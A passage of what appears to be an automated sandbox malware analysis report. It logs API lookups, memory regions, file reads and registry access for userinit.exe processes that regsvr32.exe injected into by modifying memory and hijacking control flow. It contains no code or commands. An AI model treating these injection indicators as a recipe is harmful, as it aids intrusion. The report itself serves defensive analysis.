Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 856047	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #44: userinit.exe

222

0

»

Information	Value
ID	#44
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:47, Reason: Child Process
Unmonitor	End Time: 00:02:51, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x844
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 84C 0x 834 0x 8C8

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
locale.nls	0x00050000	0x000b6fff	Memory Mapped File	r	-
private_0x00000000000c0000	0x000c0000	0x000c0fff	Private Memory	rw	-
userinit.exe	0x000d0000	0x000d8fff	Memory Mapped File	rwx	-
private_0x00000000000e0000	0x000e0000	0x0014ffff	Private Memory	rw	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	rwx	-
pagefile_0x00000000000f0000	0x000f0000	0x000f6fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000100000	0x00100000	0x00101fff	Pagefile Backed Memory	rw	-
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	rw	-
oleaccrc.dll	0x00150000	0x00150fff	Memory Mapped File	r	-
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	rwx	-
private_0x0000000000170000	0x00170000	0x001affff	Private Memory	rw	-
pagefile_0x00000000001b0000	0x001b0000	0x00277fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000280000	0x00280000	0x00281fff	Pagefile Backed Memory	r	-
private_0x00000000002a0000	0x002a0000	0x002affff	Private Memory	rw	-
private_0x00000000002b0000	0x002b0000	0x003affff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000580000	0x00580000	0x0117ffff	Pagefile Backed Memory	r	-
private_0x0000000001180000	0x01180000	0x0127ffff	Private Memory	-	-
private_0x0000000001280000	0x01280000	0x012fffff	Private Memory	rw	-
private_0x0000000001300000	0x01300000	0x0130ffff	Private Memory	rw	-
pagefile_0x0000000001310000	0x01310000	0x013eefff	Pagefile Backed Memory	r	-
private_0x00000000013f0000	0x013f0000	0x014cffff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x01470fff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x01474fff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x01478fff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x0147cfff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x01480fff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x01484fff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x01488fff	Private Memory	rw	-
private_0x00000000013f0000	0x013f0000	0x0148cfff	Private Memory	rw	-
private_0x0000000001490000	0x01490000	0x014cffff	Private Memory	rw	-
staticcache.dat	0x014d0000	0x01dfffff	Memory Mapped File	r	-
pagefile_0x0000000001e00000	0x01e00000	0x021f2fff	Pagefile Backed Memory	r	-
private_0x0000000002200000	0x02200000	0x0230cfff	Private Memory	rw	-
private_0x0000000002310000	0x02310000	0x0240ffff	Private Memory	rw	-
private_0x0000000002410000	0x02410000	0x0260ffff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02692fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02696fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0269afff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0269efff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026a2fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026a6fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026aafff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026aefff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026b4fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026b8fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026bcfff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026c2fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026c6fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026cafff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026cefff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026d4fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026d8fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026dcfff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026e2fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026e6fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026eafff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026eefff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026f4fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026f8fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x026fcfff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02702fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02706fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0270afff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0270efff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02714fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x02718fff	Private Memory	rw	-
private_0x0000000002610000	0x02610000	0x0271cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02750fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02766fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0276afff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0276efff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02784fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02788fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x0278cfff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x02790fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027a6fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027aafff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027aefff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027c4fff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027c8fff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027ccfff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027d0fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027e6fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027eafff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x027eefff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02804fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02808fff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x0280cfff	Private Memory	rw	-
private_0x0000000002710000	0x02710000	0x02810fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x02826fff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0282afff	Private Memory	rw	-
private_0x0000000002720000	0x02720000	0x0282ffff	Private Memory	-	-
private_0x0000000002760000	0x02760000	0x02802fff	Private Memory	rw	-
private_0x0000000002770000	0x02770000	0x02820fff	Private Memory	rw	-
private_0x00000000027a0000	0x027a0000	0x02862fff	Private Memory	rw	-
private_0x00000000027b0000	0x027b0000	0x02880fff	Private Memory	rw	-
private_0x00000000027e0000	0x027e0000	0x028c2fff	Private Memory	rw	-
private_0x00000000027f0000	0x027f0000	0x028e0fff	Private Memory	rw	-
private_0x0000000002820000	0x02820000	0x02922fff	Private Memory	rw	-
private_0x0000000002830000	0x02830000	0x02942fff	Private Memory	rwx	-
private_0x0000000002950000	0x02950000	0x02a4ffff	Private Memory	-	-
private_0x0000000002aa0000	0x02aa0000	0x02adffff	Private Memory	rw	-
private_0x0000000002bb0000	0x02bb0000	0x02caffff	Private Memory	rw	-
sortdefault.nls	0x02cb0000	0x02f7efff	Memory Mapped File	r	-
comctl32.dll	0x6d720000	0x6d7a3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6d820000	0x6d838fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffd7000	0x7ffd7000	0x7ffd7fff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 19 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffd7008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x84c, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6d820000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6d720000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ló, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6d75266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6d752542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6d751d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6d75238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6d7520c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6d751fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6d751e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6d751f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6d751ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6d75216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6d7522be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6d7521e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6d8220ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6d8220b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6d8220c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6d8220d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 921583	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #45: userinit.exe

222

0

»

Information	Value
ID	#45
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:48, Reason: Child Process
Unmonitor	End Time: 00:02:51, Reason: Self Terminated
Monitor Duration	00:00:03

OS Process Information

»

Information	Value
PID	0x850
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 518 0x 294 0x 334

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x00050fff	Private Memory	rw	-
private_0x0000000000060000	0x00060000	0x00060fff	Private Memory	rwx	-
private_0x0000000000070000	0x00070000	0x000affff	Private Memory	rw	-
pagefile_0x00000000000b0000	0x000b0000	0x000b6fff	Pagefile Backed Memory	r	-
pagefile_0x00000000000c0000	0x000c0000	0x000c1fff	Pagefile Backed Memory	rw	-
userinit.exe	0x000d0000	0x000d8fff	Memory Mapped File	rwx	-
locale.nls	0x000e0000	0x00146fff	Memory Mapped File	r	-
oleaccrc.dll	0x00150000	0x00150fff	Memory Mapped File	r	-
private_0x0000000000160000	0x00160000	0x00160fff	Private Memory	rwx	-
